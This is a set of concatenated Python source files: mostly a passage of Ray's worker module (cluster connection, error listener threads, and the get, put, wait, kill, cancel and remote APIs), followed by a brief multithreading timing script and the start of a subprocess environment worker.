colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
def listen_error_messages_from_gcs(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to be published.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.gcs_subscriber = GcsSubscriber(channel=worker.gcs_channel)
# Exports that are published after the call to
# gcs_subscriber.subscribe_error() and before the call to
# gcs_subscriber.poll_error() will still be processed in the loop.
# TODO: we should just subscribe to the errors for this specific job.
worker.gcs_subscriber.subscribe_error()
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if received a signal that the thread should stop.
if threads_stopped.is_set():
return
_, error_data = worker.gcs_subscriber.poll_error()
if error_data is None:
continue
if error_data.job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if error_data.type == ray_constants.TASK_PUSH_ERROR:
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, ConnectionError) as e:
logger.error(f"listen_error_messages_from_gcs: {e}")
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
startup_token=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
startup_token (int): The startup token of the process assigned to
it during startup as a command line argument.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
worker.gcs_channel = gcs_utils.create_gcs_channel(
gcs_utils.get_gcs_address_from_redis(worker.redis_client))
worker.gcs_client = gcs_utils.GcsClient(channel=worker.gcs_channel)
_initialize_internal_kv(worker.gcs_client)
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
worker.gcs_pubsub_enabled = gcs_pubsub_enabled()
worker.gcs_publisher = None
if worker.gcs_pubsub_enabled:
worker.gcs_publisher = GcsPublisher(channel=worker.gcs_channel)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.publish_error_to_driver(
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None,
redis_client=worker.redis_client,
gcs_publisher=worker.gcs_publisher)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if (mode == SCRIPT_MODE and not job_config.client_job
and job_config.runtime_env):
scratch_dir: str = worker.node.get_runtime_env_dir_path()
runtime_env = job_config.runtime_env or {}
runtime_env = upload_py_modules_if_needed(
runtime_env, scratch_dir, logger=logger)
runtime_env = upload_working_dir_if_needed(
runtime_env, scratch_dir, logger=logger)
# Remove excludes, it isn't relevant after the upload step.
runtime_env.pop("excludes", None)
job_config.set_runtime_env(runtime_env)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid, startup_token)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_from_gcs
if worker.gcs_pubsub_enabled else listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING).decode(
"utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
if hasattr(worker, "gcs_subscriber"):
worker.gcs_subscriber.close()
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
placement_group="default",
worker=None,
retry_exceptions=None,
concurrency_groups=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env, placement_group)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(
function_or_class, num_cpus, num_gpus, memory,
object_store_memory, resources, accelerator_type, max_restarts,
max_task_retries, runtime_env, concurrency_groups)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
"runtime_env",
"retry_exceptions",
"placement_group",
"concurrency_groups",
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
placement_group = kwargs.get("placement_group", "default")
retry_exceptions = kwargs.get("retry_exceptions")
concurrency_groups = kwargs.get("concurrency_groups")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
placement_group=placement_group,
worker=worker,
retry_exceptions=retry_exceptions,
concurrency_groups=concurrency_groups or [])
|
multithreading_test.py | from do_something import *
import time
import threading
if __name__ == "__main__":
start_time = time.time()
size = 10000000
threads = 10
jobs = []
for i in range(0, threads):
out_list = list()
thread = threading.Thread(target=do_something(size, out_list))
jobs.append(thread)
for j in jobs:
j.start()
for j in jobs:
j.join()
print("List processing complete.")
end_time = time.time()
print("multithreading time=", end_time - start_time)
|
subproc_vec_env.py | import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
